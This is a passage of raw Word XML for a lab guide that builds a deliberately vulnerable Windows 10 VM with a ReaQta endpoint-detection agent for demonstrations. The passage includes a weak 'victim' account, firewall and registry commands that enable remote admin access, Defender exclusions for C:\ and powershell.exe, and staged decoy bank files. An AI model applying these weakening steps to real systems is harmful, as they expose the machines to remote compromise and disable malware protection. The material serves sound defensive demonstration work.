          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="116BFB1E" w14:textId="77777777" w:rsidR="001A6A55" w:rsidRDefault="001A6A55" w:rsidP="001A6A55"/>
    <w:p w14:paraId="1D4D85C6" w14:textId="58E80F33" w:rsidR="0084610A" w:rsidRPr="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="0084610A">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create then run a batch script called </w:t>
      </w:r>
      <w:r w:rsidRPr="00162B50">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>fixGID.bat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>with the following content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4211B580" w14:textId="54ADAC4C" w:rsidR="0084610A" w:rsidRDefault="00F217E1" w:rsidP="0084610A">
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="00815B2C" w:rsidRPr="001D02CB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://raw.githubusercontent.com/sudonim007/reaqta/main/fixGID.bat</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="25B7BB79" w14:textId="45E08F9D" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="0084610A"/>
    <w:p w14:paraId="52F2622F" w14:textId="706E6315" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="0084610A">
      <w:r>
        <w:t>Reboot the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52100290" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="0084610A"/>
    <w:p w14:paraId="3C6CCEA9" w14:textId="77777777" w:rsidR="0084610A" w:rsidRDefault="0084610A" w:rsidP="0084610A"/>
    <w:p w14:paraId="29D0A259" w14:textId="58EB3DA1" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc101267846"/>
      <w:r>
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Windows 10 VM with ReaQta Agent</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="515502B0" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="005C68C9"/>
    <w:p w14:paraId="51FF0F3B" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C">
      <w:r>
        <w:t xml:space="preserve">Make sure </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>you're</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> using the Pro version of Fusion (Mac) or VMware Workstation. Remove Virtual Box if you have it installed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F824A6" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRPr="00345EE8" w:rsidRDefault="00815B2C" w:rsidP="00815B2C"/>
    <w:p w14:paraId="0AA2C275" w14:textId="3CBD6EF7" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C">
      <w:r>
        <w:t xml:space="preserve">Install Windows </w:t>
      </w:r>
      <w:r w:rsidR="002809B7">
        <w:t xml:space="preserve">10 </w:t>
      </w:r>
      <w:r>
        <w:t>as a VMware VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210AC74A" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C"/>
    <w:p w14:paraId="358C31FB" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use a username of </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC57EA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>'victim'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with a password of </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC57EA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>'weak123'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E664AB1" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="154C4058" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRPr="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C">
      <w:r w:rsidRPr="00815B2C">
        <w:t>After installation, ru</w:t>
      </w:r>
      <w:r>
        <w:t>n Windows U</w:t>
      </w:r>
      <w:r w:rsidRPr="00815B2C">
        <w:t xml:space="preserve">pdate </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00815B2C">
        <w:t>and also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00815B2C">
        <w:t xml:space="preserve"> ensure that Defender is up-to-date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294D33DB" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C"/>
    <w:p w14:paraId="11CB21C4" w14:textId="0394867C" w:rsidR="00815B2C" w:rsidRDefault="002809B7" w:rsidP="00815B2C">
      <w:r>
        <w:t>As above, s</w:t>
      </w:r>
      <w:r w:rsidR="00815B2C">
        <w:t>top and disable the Windows Update service using the services UI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DB2170" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C"/>
    <w:p w14:paraId="499E993B" w14:textId="4E6A2423" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C">
      <w:r>
        <w:t xml:space="preserve">Change </w:t>
      </w:r>
      <w:r w:rsidR="00EF1786">
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sleep and screen-off times to 'Never'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64695A94" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C"/>
    <w:p w14:paraId="38C4BA0E" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C">
      <w:r>
        <w:t>Use the following network config:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E228034" w14:textId="4ED433CC" w:rsidR="00815B2C" w:rsidRPr="001A6A55" w:rsidRDefault="00815B2C" w:rsidP="00815B2C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>IP: 192.168.57.26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9D31EB" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRPr="001A6A55" w:rsidRDefault="00815B2C" w:rsidP="00815B2C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A6A55">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Netmask</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A6A55">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>: 255.255.255.0 (/24)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7590D4EB" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRPr="001A6A55" w:rsidRDefault="00815B2C" w:rsidP="00815B2C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A6A55">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Default route: 192.168.57.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50451F53" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRPr="001A6A55" w:rsidRDefault="00815B2C" w:rsidP="00815B2C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A6A55">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DNS: 8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CF98FC" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C"/>
    <w:p w14:paraId="652CA940" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C"/>
    <w:p w14:paraId="7D65F4CE" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C">
      <w:r>
        <w:t>Install VMware tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6D8D01" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C"/>
    <w:p w14:paraId="44C7371B" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C"/>
    <w:p w14:paraId="2999D52F" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C">
      <w:r>
        <w:t>Launch cmd.exe running as Administrator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9445C4" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C"/>
    <w:p w14:paraId="0C4533F1" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08C18B70" wp14:editId="040F02F6">
            <wp:extent cx="1328815" cy="28384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6039" cy="2875241"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E65FD1" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C"/>
    <w:p w14:paraId="01F6C8C5" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C"/>
    <w:p w14:paraId="7380D9FF" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C"/>
    <w:p w14:paraId="313800D4" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C">
      <w:r>
        <w:t>Run these commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8492DE" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRPr="009040F4" w:rsidRDefault="00815B2C" w:rsidP="00815B2C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009040F4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009040F4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009040F4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>advfirewall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009040F4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> firewall set rule group="File and Printer Sharing" new enable=Yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15031DED" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="339FC751" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009040F4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>reg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009040F4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">rrentVersion\Policies\System /v </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009040F4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>LocalAccountTokenFilterPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009040F4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> /t  REG_DWORD /d 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AE4D70" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20DD8174" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C"/>
    <w:p w14:paraId="6CBC08B8" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRPr="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create then run a batch script called </w:t>
      </w:r>
      <w:r w:rsidRPr="00162B50">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>fixGID.bat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>with the following content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A762EC" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00F217E1" w:rsidP="00815B2C">
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidR="00815B2C" w:rsidRPr="001D02CB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://raw.githubusercontent.com/sudonim007/reaqta/main/fixGID.bat</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="248AB6C0" w14:textId="77777777" w:rsidR="00815B2C" w:rsidRDefault="00815B2C" w:rsidP="00815B2C"/>
    <w:p w14:paraId="7F812682" w14:textId="4A26D5E2" w:rsidR="005C68C9" w:rsidRDefault="005C68C9" w:rsidP="005C68C9">
      <w:r>
        <w:t xml:space="preserve">Change the Machine/System Hostname so it is easily identifiable to you on the ReaQta Hive Dashboard. </w:t>
      </w:r>
      <w:r w:rsidR="001A6A55">
        <w:t>Use</w:t>
      </w:r>
      <w:r w:rsidR="00837A57">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> follow</w:t>
      </w:r>
      <w:r w:rsidR="00837A57">
        <w:t>ing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the naming convention:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A1AE1B" w14:textId="77777777" w:rsidR="001A6A55" w:rsidRDefault="001A6A55" w:rsidP="005C68C9"/>
    <w:p w14:paraId="4807C053" w14:textId="42700376" w:rsidR="005C68C9" w:rsidRDefault="005C68C9" w:rsidP="005C68C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984A6B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">DESKTOP-&lt;your </w:t>
      </w:r>
      <w:r w:rsidR="00EF1786">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>initials</w:t>
      </w:r>
      <w:r w:rsidRPr="00984A6B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DAFB6D" w14:textId="77777777" w:rsidR="001A6A55" w:rsidRPr="00984A6B" w:rsidRDefault="001A6A55" w:rsidP="005C68C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26ADC4E0" w14:textId="19FCB427" w:rsidR="00837A57" w:rsidRDefault="00837A57" w:rsidP="005C68C9">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DD6E7F7" wp14:editId="2763C94F">
            <wp:extent cx="2133600" cy="3716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436" cy="3733196"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E97F711" w14:textId="535BC309" w:rsidR="00837A57" w:rsidRDefault="00837A57" w:rsidP="005C68C9"/>
    <w:p w14:paraId="02560D69" w14:textId="0E16F691" w:rsidR="00837A57" w:rsidRDefault="00837A57" w:rsidP="005C68C9">
      <w:r>
        <w:t>Select Rename PC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FDD1C6" w14:textId="77777777" w:rsidR="00837A57" w:rsidRDefault="00837A57" w:rsidP="005C68C9"/>
    <w:p w14:paraId="3EA3909D" w14:textId="3721CD75" w:rsidR="00837A57" w:rsidRPr="005C68C9" w:rsidRDefault="00837A57" w:rsidP="005C68C9">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26D3C6BE" wp14:editId="415F5E17">
            <wp:extent cx="6858000" cy="154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549400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B561F5" w14:textId="5EEB7620" w:rsidR="00837A57" w:rsidRDefault="00837A57" w:rsidP="001A6A55">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A1F9680" w14:textId="77777777" w:rsidR="00AE1C4C" w:rsidRPr="00AE1C4C" w:rsidRDefault="00AE1C4C" w:rsidP="00AE1C4C"/>
    <w:p w14:paraId="249B2294" w14:textId="160DE2D4" w:rsidR="00837A57" w:rsidRDefault="00837A57">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F31B11C" w14:textId="2DDFA51A" w:rsidR="0022743A" w:rsidRDefault="0022743A" w:rsidP="008A019F">
      <w:r w:rsidRPr="0022743A">
        <w:t>Reboot the machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CD9F0C" w14:textId="2E80D16B" w:rsidR="002809B7" w:rsidRDefault="002809B7" w:rsidP="008A019F"/>
    <w:p w14:paraId="3999D7C9" w14:textId="77777777" w:rsidR="002809B7" w:rsidRDefault="002809B7" w:rsidP="002809B7">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Install Microsoft Office. Enable the Developer tab in </w:t>
      </w:r>
      <w:r w:rsidRPr="00984A6B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Options / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00984A6B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Customise</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00984A6B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Ribbon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AE3F3F" w14:textId="77777777" w:rsidR="00984A6B" w:rsidRDefault="00984A6B" w:rsidP="008A019F"/>
    <w:p w14:paraId="2CA64AAB" w14:textId="00A842B1" w:rsidR="00216102" w:rsidRDefault="00216102" w:rsidP="00216102">
      <w:r>
        <w:t>In Defender, add exclusion</w:t>
      </w:r>
      <w:r w:rsidR="006373AA">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for the </w:t>
      </w:r>
      <w:r w:rsidR="006373AA" w:rsidRPr="006373AA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="006373AA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="006373AA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="006373AA">
        <w:t xml:space="preserve"> drive and </w:t>
      </w:r>
      <w:r w:rsidR="006373AA" w:rsidRPr="006373AA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>powershell.exe</w:t>
      </w:r>
      <w:r w:rsidR="006373AA">
        <w:t xml:space="preserve"> process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E75D5AA" w14:textId="77777777" w:rsidR="00216102" w:rsidRDefault="00216102" w:rsidP="00216102"/>
    <w:p w14:paraId="639476ED" w14:textId="76CBF614" w:rsidR="00216102" w:rsidRDefault="006373AA" w:rsidP="00216102">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D67BD95" wp14:editId="628E7346">
            <wp:extent cx="5581650" cy="359706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27" cy="3603171"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6EC37B" w14:textId="77777777" w:rsidR="00216102" w:rsidRDefault="00216102" w:rsidP="00216102"/>
    <w:p w14:paraId="23CA3D4E" w14:textId="77777777" w:rsidR="006373AA" w:rsidRDefault="006373AA" w:rsidP="00216102"/>
    <w:p w14:paraId="44B63B54" w14:textId="5053394E" w:rsidR="00216102" w:rsidRDefault="00216102" w:rsidP="00216102">
      <w:r>
        <w:t>Download and unzip this file onto the desktop:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DB8DF8" w14:textId="38D89EB0" w:rsidR="006373AA" w:rsidRDefault="001355D0" w:rsidP="00216102">
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00A33BB1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://github.com/sudonim007/reaqta/raw/main/ReaQtaDemoFiles.zip</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4B5BFFD8" w14:textId="77777777" w:rsidR="001355D0" w:rsidRDefault="001355D0" w:rsidP="00216102"/>
    <w:p w14:paraId="31C7FFBF" w14:textId="7FA476BB" w:rsidR="002809B7" w:rsidRDefault="002809B7" w:rsidP="002809B7">
      <w:r>
        <w:t>Install the ReaQta agent and use this config when prompted:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AB0359" w14:textId="77777777" w:rsidR="002809B7" w:rsidRPr="00793E05" w:rsidRDefault="002809B7" w:rsidP="002809B7">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00793E05">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ReaqtaHive.msi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAC59AE" w14:textId="77777777" w:rsidR="002809B7" w:rsidRDefault="002809B7" w:rsidP="002809B7">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DF934B7" w14:textId="77777777" w:rsidR="002809B7" w:rsidRDefault="002809B7" w:rsidP="002809B7">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3D57">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>https://</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008A3D57">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>169.50.130.151:4443  --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008A3D57">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>gids</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A3D57">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 817127595500896263,832578758459260935</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C68156B" w14:textId="77777777" w:rsidR="002809B7" w:rsidRDefault="002809B7" w:rsidP="002809B7">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="600A618B" w14:textId="77777777" w:rsidR="002809B7" w:rsidRDefault="002809B7" w:rsidP="002809B7">
      <w:r>
        <w:t>Reboot the machine again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7433F3D7" w14:textId="77777777" w:rsidR="002809B7" w:rsidRDefault="002809B7" w:rsidP="00216102"/>
    <w:p w14:paraId="083BD579" w14:textId="0F380C13" w:rsidR="00216102" w:rsidRDefault="00216102" w:rsidP="00216102">
      <w:r>
        <w:t>Create this directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A79366E" w14:textId="77777777" w:rsidR="00216102" w:rsidRPr="00837A57" w:rsidRDefault="00216102" w:rsidP="00216102">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00837A57">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>C:\users\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>victim</w:t>
      </w:r>
      <w:r w:rsidRPr="00837A57">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>\CompanyFiles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172A1200" w14:textId="583890D2" w:rsidR="00216102" w:rsidRDefault="00216102" w:rsidP="00216102">
      <w:r>
        <w:t xml:space="preserve">Move these files into the newly created </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00984A6B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CompanyFiles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44013D2D" w14:textId="77777777" w:rsidR="00216102" w:rsidRPr="00984A6B" w:rsidRDefault="00216102" w:rsidP="00216102">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984A6B">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Customer Bank Details.xlsx</w:t>
      </w:r>
    </w:p>
